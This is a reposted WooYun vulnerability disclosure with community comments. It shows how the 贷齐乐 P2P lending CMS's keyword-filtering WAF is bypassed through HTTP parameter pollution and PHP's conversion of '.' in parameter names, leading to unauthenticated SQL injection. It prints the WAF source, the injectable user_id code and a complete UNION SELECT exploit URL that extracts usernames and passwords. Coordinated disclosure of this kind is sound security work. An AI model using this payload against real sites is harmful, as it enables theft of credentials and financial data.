贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询) 公开时间: 2016-04-21 22:58

来源:互联网 发布:java陈芸 编辑:程序博客网 时间:2024/05/18 16:17

漏洞详情

披露状态:

2016-01-22: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2016-03-17: 细节向核心白帽子及相关领域专家公开
2016-03-27: 细节向普通白帽子公开
2016-04-06: 细节向实习白帽子公开

简要描述:

贷齐乐系统最新版SQL注入,无需登录绕过WAF可union select跨表查询,用官方给的例子『宁波贷』作为验证。
绕过WAF,是不是还有额外奖金呢?

详细说明:

0x01 被WAF武装的贷齐乐

随便给一个贷齐乐最新版的SQL注入,如 http://**.**.**.**/index.php?blog&q=viewfast&id=xxx ,测试后可以发现,根本无法获取任何敏感信息,连数据库版本和用户名都没法获取。

贷齐乐这个系统,说起来也是安全问题比较严重的P2P金融类的CMS。由于连续出了多次安全漏洞,所以官方给贷齐乐系统中添加了严重影响正常使用的变态WAF。

我们先来看看WAF都有哪些功能。(由于我的代码非最新版,所以可能和实际测试有些出入)

/core/sqlin.inc.php,包含在config.inc.php中,所有请求都会经由此类过滤:

code 区域
class sqlin {function dowith_sql($str) {$check= eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $str);if($check){echo "非法字符!";exit();}$newstr="";while($newstr!=$str){$newstr=$str;        $str = str_replace("script", "", $str);        $str = str_replace("execute", "", $str);        $str = str_replace("update", "", $str);        //$str = str_replace("count", "", $str);        //注释掉对count的过滤,不然account这样的参数会被截断        $str = str_replace("master", "", $str);        $str = str_replace("truncate", "", $str);        $str = str_replace("declare", "", $str);        $str = str_replace("select", "", $str);        $str = str_replace("create", "", $str);        $str = str_replace("delete", "", $str);        $str = str_replace("insert", "", $str);        $str = str_replace("\'", "", $str);        }return $str;    }//aticle()防SQL注入函数//php教程    function sqlin() {        foreach ($_GET as $key => $value) {//echo $key."|".(strpos($key, "password") == false);            if ($key != "content"&&strstr($key, "password") == false) {                $_GET[$key] = $this->dowith_sql($value);            }        }        foreach ($_POST as $key => $value) {//echo $key."|".(strpos($key, "password") == false);//@file_put_contents('wxy123123.txt', date('Ymd His') . '提交url拼接 '.$key."|".(strstr($key, "password") == false), FILE_APPEND);            if ($key != "content"&&strstr($key, "password") == false) {                $_POST[$key] = $this->dowith_sql($value);            }        }foreach ($_REQUEST as $key => $value) {//echo $key."|".(strpos($key, "password") == false);            if ($key != "content"&&strstr($key, "password") == false) {                $_REQUEST[$key] = $this->dowith_sql($value);            }        }    }}



GET/POST/REQUEST三个变量,都会经过这个正则:`select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile`,你怕了吗?

一旦遇到select,包括单引号,包括注释符,就立即exit整个流程。

我们在宁波贷官网测试一下效果:

14533972846845.jpg



吓哭了吧?

这还只是WAF之一,再看 /core/safe.inc.php

code 区域
/* 检查和转义字符 */function safe_str($str){if(!get_magic_quotes_gpc()){if( is_array($str) ) {foreach($str as $key => $value) {$str[$key] = safe_str($value);}}else{$str = addslashes($str);}}return $str;}function dhtmlspecialchars($string) {if(is_array($string)) {foreach($string as $key => $val) {$string[$key] = dhtmlspecialchars($val);}} else {$string = str_replace(array('&', '"', '<', '>','(',')'), array('&amp;', '&quot;', '&lt;', '&gt;','(',')'), $string);if(strpos($string, '&amp;#') !== false) {$string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);}}return $string;}foreach ($_GET as $key => $value) {$_GET[$key] = safe_str($value);$_GET[$key] = dhtmlspecialchars($value);}foreach ($_POST as $key => $value) {$_POST[$key] = safe_str($value);$_GET[$key] = dhtmlspecialchars($value);}foreach ($_REQUEST as $key => $value) {$_REQUEST[$key] = safe_str($value);$_REQUEST[$key] = dhtmlspecialchars($value);}foreach ($_COOKIE as $key => $value) {$_COOKIE[$key] = safe_str($value);$_GET[$key] = dhtmlspecialchars($value);}



GET/POST/REQUEST/COOKIE都会经过这个替换`str_replace(array('&', '"', '<', '>','(',')'), array('&amp;', '&quot;', '&lt;', '&gt;','(',')'), $string)`,你怕了吗?

这个替换最明显的效果,就是所有的英文括号都变成中文括号,这导致我后面的SQL注入过程遇到了很大麻烦。

比如文章开头给的注入点,因为没有括号也没有select,所以我拿不到任何敏感信息:

Mozilla_Firefox.png



所以,原本千疮百孔的贷齐乐,穿了一件钢铁盔甲,仿佛成为了一个『安全』的P2P金融系统。



0x02 变量获取的逻辑顺序

那么,我们来总结一下贷齐乐这个CMS的特点:



1. SQL注入漏洞很多

2. WAF拦截导致无法获取敏感信息



那么,如果想找到可以使用的SQL注入漏洞,首要任务就是绕过WAF。通过阅读源码,我列出贷齐乐系统对于输入(包括WAF)的处理过程:

code 区域
index.php -> config.inc.php -> sqlin.php -> safe.inc.php



sqlin.php是对select、union、'等关键字的拦截。一旦发现存在这些关键字,就exit出整个执行流程。

safe.inc.php是替换一些敏感字符,比如<、>、(、)等。

但我在safe.inc.php里找到了如下一段代码(在替换之前):

code 区域
$request_uri = explode("?", $_SERVER['REQUEST_URI']);if (isset($request_uri[1])) {$rewrite_url = explode("&", $request_uri[1]);foreach ($rewrite_url as $key => $value) {$_value = explode("=", $value);if (isset($_value[1])) {$_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));//$_REQUEST[$_value[0]] = addslashes($_value[1]);//$_REQUEST[$_value[0]] = dhtmlspecialchars($_value[1]);}}}



将`$_SERVER['REQUEST_URI']`用?分开,?后面的内容再用&切割成数组,遍历这个数组。对数组中的每个字符串,再用=分成0和1,最后填入到`$_REQUEST`数组中:`$_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));`

这个过程等于手工处理了一遍REQUEST_URI,将REQUEST_URI中的字符串分割成数组覆盖到REQUEST里。

按道理来说并没有什么大错误,但试想:这个过程是在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入`$_REQUEST`中,就可以造成WAF的绕过了。

那么有什么办法让第一道WAF认为请求中没有恶意字符?这其实是个很难的问题,因为WAF会检测所有请求数组,只要有一个数组内的值存在问题,就直接退出。



0x03 PHP小特性带来的大作用

说漏洞之前,我们先写一个小脚本,在本地测试一些东西:

code 区域
<?phpecho $_REQUEST['foo1'];?>



很简单一个输出请求数据的脚本。我们访问这个链接:/t.php?foo1=11111&foo1=22222

14534010852138.jpg



输出的是22222,也就是说,当我们输入两个相同名字的参数的时候,php是取后一个的。这就是HTTP Parameter Pollution在PHP中的表现。

我将测试代码修改为如下:

code 区域
<?php function dhtmlspecialchars($string) {if(is_array($string)) {foreach($string as $key => $val) {$string[$key] = dhtmlspecialchars($val);}} else {$string = str_replace(array('&', '"', '<', '>','(',')'), array('&amp;', '&quot;', '&lt;', '&gt;','(',')'), $string);if(strpos($string, '&amp;#') !== false) {$string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);}}return $string;}$request_uri = explode("?", $_SERVER['REQUEST_URI']);if (isset($request_uri[1])) {    $rewrite_url = explode("&", $request_uri[1]);    foreach ($rewrite_url as $key => $value) {        $_value = explode("=", $value);        if (isset($_value[1])) {            $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));            //$_REQUEST[$_value[0]] = addslashes($_value[1]);            //$_REQUEST[$_value[0]] = dhtmlspecialchars($_value[1]);        }    }}echo $_REQUEST['foo2'];?>



访问/t.php?foo2=11111&foo2=22222,看看效果:

14534011420236.jpg



输出的是22222,也就是说,当我们输入两个相同名字的参数的时候,这段脚本也是取后一个的。



实验做完了,回到漏洞。

我一直在思考,假设我有一个办法,在第一次WAF检测参数的时候,检测的是22222,但后面覆盖request的时候,拿到的是11111,那么不就可以造成WAF的绕过了么?

但上述两个实验的结果表示,我这个假设是不成立的。二者获取的结果都是22222 。那么,这个思路是否就是不可行的了?

撸大师曾经提到过一个php特性: http://**.**.**.**/bugs/wooyun-2010-064792

php自身在解析请求的时候,如果参数名字中包含" "、"."、"["这几个字符,会将他们转换成下划线。

那么假设我发送的是这样一个请求: /t.php?user_id=11111&user.id=22222 ,php先将user.id转换成user_id,即为/t.php?user_id=11111&user_id=22222 ,再获取到的`$_REQUEST['user_id']`就是22222。

可在`$_SERVER['REQUEST_URI']`中,user_id和user.id却是两个完全不同的参数名,那么切割覆盖后,获取的`$_REQUEST['user_id']`却是11111。

完美践行了我上述的思路:WAF检测的是22222,实际插入数据库的却是11111.



0x04 实践是检验真理的唯一标准

上一节,实际上都是我在YY,这一节我需要找到一个真正满足条件的漏洞来。上述的绕过思路是有条件限制的,如下:



1. 先需要找到一个注入点

2. 注入点可控变量需要获取自$_REQUEST

3. 变量的名字必须包含下划线



好找吗?其实在千疮百孔的贷齐乐系统中,这些条件很容易满足。文件 /core/user.class.php 394行:

code 区域
public static function GetOne($data = array()){global $mysql;$user_id = isset($data['user_id'])?$data['user_id']:"";$username = isset($data['username'])?$data['username']:"";$password = isset($data['password'])?$data['password']:"";$email = isset($data['email'])?$data['email']:"";$type_id = isset($data['type_id'])?$data['type_id']:"";$sql = "CREATE TABLE IF NOT EXISTS `{user_cache}` ( `user_id` int(11) NOT NULL DEFAULT '0')";$mysql ->db_query($sql);if ($user_id == "" && $username == "") return self::ERROR;$sql = "select p2.name as typename,p2.type,p3.*,p4.*,p5.*,p1.*  from `{user}` as p1 left join `{user_type}` as p2 on  p1.type_id = p2.type_id left join `{user_cache}` as p3 on  p3.user_id = p1.user_id left join `{account}` as p4 on  p4.user_id = p1.user_id left join `{userinfo}` as p5 on  p5.user_id = p1.user_id where 1=1 ";if ($user_id!=""){$sql .= " and p1.user_id = $user_id";}if ($password!=""){$sql .= " and  p1.password = '".md5($password)."'";}if ($username!=""){$sql .= " and  p1.username = '$username'";}if ($email!=""){$sql .= " and  p1.email = '$email'";}if ($type_id!=""){$sql .= " and p1.type_id = '$type_id'";}return $mysql->db_fetch_array($sql);}



这个user_id,就可以满足条件。我们访问如下链接,即可发现报错:

14534034866079.jpg



可说明这是一个SQL注入。我们用常规SQL注入手段,即可发现被WAF拦截:

14534035537289.jpg



那么我们用上一节说的手法,加个user.id=123123,试试还会不会被拦截了:

14534037105927.jpg



妥妥了,不拦截了,而且SQL注入也可以正常进行。

因为获取的是REQUEST_URI,所以特殊字符会被url编码,没关系可以用一些关键词替换。另外,我们这个方法只能绕过检测的WAF,没法绕过safe.inc.php里替换的WAF,所以还是没法使用括号。

即使如此,对于union select注入来说,括号什么的完全不需要呀~

最后构造的exp为:

code 区域
http://**.**.**.**/?query_site=home&user_id=-1/**/Union/**/SElect/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,username,password,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194/**/from/**/dw_user/**/limit/**/0,1&user.id=1



可以直接注射获得任意数据库内信息,比如管理员密码:

14534039362628.jpg





0x05 总结

这个洞的挖掘包括利用其实很巧妙,利用的是hpp+php特性,来绕过CMS应用中变态的WAF。造成漏洞 的根本原因不在hpp,也不在php的这个特性,根本原因是贷齐乐内部存在太多显而易见的SQL注入漏洞。

但由于其官方开发人员过于相信WAF,或者说他们并没有正确处理SQL注入漏洞的能力,只能通过拦截一些关键字来抵御SQL注入。那么一旦WAF被绕过,将造成无法挽回的损失。

漏洞证明:

见上面

修复方案:

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-01-22 22:58

厂商回复:

苦思一年过后,找了扔了的骨头,继续啃。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

评价

  1. 2016-01-22 16:07 | JutaZ( 实习白帽子 | Rank:91 漏洞数:13 | 少壮不努力老大徒伤悲)
    1

    沙发

    1#
  2. 2016-01-22 16:16 | whynot( 普通白帽子 | Rank:645 漏洞数:127 | 为你解冻冰河 为你放弃世界有何不可)
    0

    沙发

    2#
  3. 2016-01-22 16:18 | 牛肉包子( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    $$$

    3#
  4. 2016-01-22 16:20 | phith0n 认证白帽子( 普通白帽子 | Rank:789 漏洞数:124 | 一个想当文人的黑客~)
    0

    非urldecode 非 base64 非加密 非编码 非IP 非上传表单。就是绕过!

    4#
  5. 2016-01-22 16:22 | k0_pwn( 普通白帽子 | Rank:108 漏洞数:14 | 专注且自由)
    0

    @phith0n p牛还要专门吊一下我们胃口

    5#
  6. 2016-01-22 16:23 | 玉林嘎 认证白帽子( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    就是叼!

    6#
  7. 2016-01-22 16:25 | loopx9 认证白帽子( 普通白帽子 | Rank:789 漏洞数:80 | ..)
    0

    叼!

    7#
  8. 2016-01-22 16:25 | 狗狗侠 认证白帽子( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)
    0

    这思路叼叼的,妥妥的精华啊! 这思路牛逼

    8#
  9. 2016-01-22 16:26 | 浮萍( 普通白帽子 | Rank:990 漏洞数:197 | 沉淀)
    0

    我要膜拜

    9#
  10. 2016-01-22 16:28 | f4ckbaidu( 普通白帽子 | Rank:224 漏洞数:29 | 开发真是日了狗了)
    0

    10#
  11. 2016-01-22 16:31 | Manning( 普通白帽子 | Rank:1068 漏洞数:132 | https://github.com/manning23/MSpider)
    0

    按照常理,通用打雷了就应该给$$$啊

    11#
  12. 2016-01-22 16:35 | 狗狗侠 认证白帽子( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)
    0

    敢想敢fuzz

    12#
  13. 2016-01-22 16:36 | 暴走( 普通白帽子 | Rank:577 漏洞数:104 | 专心补刀。)
    0

    非urldecode 非 base64 非加密 非编码 非IP 非上传表单。就是绕过!

    13#
  14. 2016-01-22 16:45 | DloveJ( 普通白帽子 | Rank:1346 漏洞数:239 | Web安全测试培训 QQ269787775)
    0

    瞬间有雷

    14#
  15. 2016-01-22 17:19 | Rainism( 路人 | Rank:11 漏洞数:3 | hacking for fun)
    0

    这个姿势好~

    15#
  16. 2016-01-22 17:46 | HackBraid 认证白帽子( 核心白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间:http://www.heysec.or...)
    0

    好屌!

    16#
  17. 2016-01-22 18:00 | BlackWolf( 普通白帽子 | Rank:111 漏洞数:29 | 狼性)
    0

    膜拜

    17#
  18. 2016-01-22 18:05 | 404notfound( 普通白帽子 | Rank:407 漏洞数:109 | 考研中,有事请留言)
    0

    你关注的白帽子 phith0n 发表了漏洞 贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)2016-01-22

    18#
  19. 2016-01-22 18:27 | komas( 普通白帽子 | Rank:107 漏洞数:25 )
    0

    可怕

    19#
  20. 2016-01-22 19:38 | 疯狗 认证白帽子( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @phith0n 通用型漏洞审计还是有很多姿势可学的 :)

    20#
  21. 2016-01-22 19:43 | ucifer( 普通白帽子 | Rank:226 漏洞数:71 | 萌萌哒~)
    0

    P牛 刁刁的

    21#
  22. 2016-01-22 19:58 | 秋风( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
    0

    NB

    22#
  23. 2016-01-22 20:10 | 来打我呀( 路人 | Rank:2 漏洞数:1 | 欢脱跳跃的小鲜肉~)
    0

    表哥你变了,你说过下次这么吊的事要教我的。。

    23#
  24. 2016-01-22 20:23 | zeracker 认证白帽子( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    好文章啊。

    24#
  25. 2016-01-22 20:45 | mramydnei( 普通白帽子 | Rank:400 漏洞数:87 )
    0

    绝对干货

    25#
  26. 2016-01-22 21:37 | onpu( 普通白帽子 | Rank:225 漏洞数:44 | 天将降大任于斯人也,必先苦其心志,劳其筋...)
    0

    $$$

    26#
  27. 2016-01-22 23:02 | DNS( 普通白帽子 | Rank:713 漏洞数:76 | root@qisec.com)
    0

    苦思一年过后,找了扔了的骨头,继续啃。 ..........

    27#
  28. 2016-01-22 23:25 | xsser 认证白帽子( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    苦思一年过后,找了扔了的骨头,继续啃

    28#
  29. 2016-01-22 23:49 | zeracker 认证白帽子( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    苦思一年过后,找了扔了的骨头,继续啃

    29#
  30. 2016-01-22 23:50 | xyang( 普通白帽子 | Rank:333 漏洞数:74 | stay hungry stay foolish)
    0

    苦思一年过后,找了扔了的骨头,继续啃

    30#
  31. 2016-01-23 00:07 | phith0n 认证白帽子( 普通白帽子 | Rank:789 漏洞数:124 | 一个想当文人的黑客~)
    0

    @xsser 厂商说话比较深奥,但rank却不愿意多给点

    31#
  32. 2016-01-23 00:17 | 牛 小 帅( 普通白帽子 | Rank:1311 漏洞数:308 | 1.乌云最帅的男人 ...)
    0

    @phith0n 不知道是不是说谁是啃发霉骨头的狗?还是神马意思?

    32#
  33. 2016-01-23 00:19 | phith0n 认证白帽子( 普通白帽子 | Rank:789 漏洞数:124 | 一个想当文人的黑客~)
    0

    @牛 小 帅 可能是说他想了一年也没想到好办法解决SQL注入的问题,只能继续靠加WAF来防御漏洞。

    33#
  34. 2016-01-23 00:22 | 牛 小 帅( 普通白帽子 | Rank:1311 漏洞数:308 | 1.乌云最帅的男人 ...)
    0

    @phith0n 要看这话是对谁说的,哈哈,比如对你,对他自己 毕竟分给的这么蹊跷

    34#
  35. 2016-01-23 00:23 | phith0n 认证白帽子( 普通白帽子 | Rank:789 漏洞数:124 | 一个想当文人的黑客~)
    0

    @牛 小 帅 无所谓咯,我只负责报漏洞,拿我的那份名与利。

    35#
  36. 2016-01-23 00:27 | 牛 小 帅( 普通白帽子 | Rank:1311 漏洞数:308 | 1.乌云最帅的男人 ...)
    0

    @phith0n p神厉害,睡了

    36#
  37. 2016-01-23 04:38 | 邪少( 实习白帽子 | Rank:79 漏洞数:14 | 百里长苏)
    0

    厂商小气了啊

    37#
  38. 2016-01-23 08:09 | 围剿( 路人 | Rank:17 漏洞数:5 | Evil decimal)
    0

    66666666

    38#
  39. 2016-01-23 19:24 | 暴走( 普通白帽子 | Rank:577 漏洞数:104 | 专心补刀。)
    0

    厂商说的这句话“苦思一年过后,找了扔了的骨头,继续啃” 感觉2015年过的很苦逼...

    39#
  40. 2016-01-25 10:00 | 小良( 路人 | Rank:8 漏洞数:2 | 根本不会挖漏洞~)
    0

    厂商回复:苦思一年过后,找了扔了的骨头,继续啃。这好几年过去了,董梁依然是这么不要脸啊~~

    40#
  41. 2016-01-25 10:59 | hkcs( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)
    0

    继续暴走,涨涨知识

    41#
  42. 2016-01-25 20:03 | do9gy( 实习白帽子 | Rank:63 漏洞数:17 | Dog loves God。)
    0

    p师父 你为何这么叼

    42#
  43. 2016-01-27 13:07 | 包包不是包( 路人 | Rank:6 漏洞数:3 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)
    0

    太刁,没盆友

    43#
  44. 2016-02-26 18:19 | 明月影( 路人 | Rank:12 漏洞数:8 )
    0

    敢想敢fuzz。我要看fuzz大法

    44#
  45. 2016-03-27 00:29 | 十字电光( 路人 | Rank:3 漏洞数:3 | 吹水 打怪兽)
    0

    扔骨头 是什么梗

    45#
  46. 2016-03-27 09:28 | U神( 核心白帽子 | Rank:1356 漏洞数:149 | 联盟托管此号中,欢迎加入08安全团队,本人...)
    0

    这个特性早有所闻,不过能运用这么厉害,也只有P牛了

    46#
  47. 2016-04-08 18:57 | _Evil (普通白帽子 | Rank:418 漏洞数:60 | 万事无他,唯手熟尔。农民也会编程,别指望天赋异能,编程没什么高深,和种田一样。小学生都能学会 ——MJ0011)

    p牛 特性漏洞真是6666

0 0
原创粉丝点击